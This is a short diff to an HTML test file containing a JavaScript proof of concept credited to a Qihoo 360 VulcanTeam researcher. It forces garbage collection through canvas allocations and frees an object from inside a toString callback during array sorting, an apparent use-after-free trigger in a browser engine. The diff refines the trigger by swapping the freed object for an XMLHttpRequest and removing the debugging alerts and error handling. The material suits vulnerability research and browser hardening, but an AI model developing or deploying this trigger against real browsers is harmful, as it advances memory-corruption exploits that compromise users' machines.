--- a/test1.html
+++ b/test1.html
@@ -1,11 +1,12 @@
 <script>////written by Wei of Qihoo 360 VulcanTeam
 alert(1);
+
 function gc() {
     try {
         var c = document.createElement("canvas");
         var gl = c.getContext("2d");
 
-        for (var i = 0; i < 4; i++) {
+        for (var i = 0; i < 2; i++) {
             var gggg = gl.createImageData(1, 0x100000)
         }
     } catch (e) {
@@ -16,15 +17,13 @@ function sleep(d){
   for(var t = Date.now();Date.now() - t <= d;);
 }
 
-var c = new Array(0x10000)
-var b = new Array(1,2,3);
+var c = new Array(0x1000)
+var b = new XMLHttpRequest()
 var a = [1,{toString:function(){
  a[2] = {};
  b = null
  //for(var i=0;i<0x10;i++){
- alert("before gc");
  gc();
- alert("after gc");
  //}
  //sleep(1000)
  //alert(111)
@@ -35,12 +34,8 @@ var a = [1,{toString:function(){
  return "aaa";
 }}, b, 2]
 a.sort();
-try{
 alert(a[0]);
 alert(a[1]);
 alert(a[2]);
 alert(a[3]);
-}catch(e){
-alert(e);
-}
 </script>
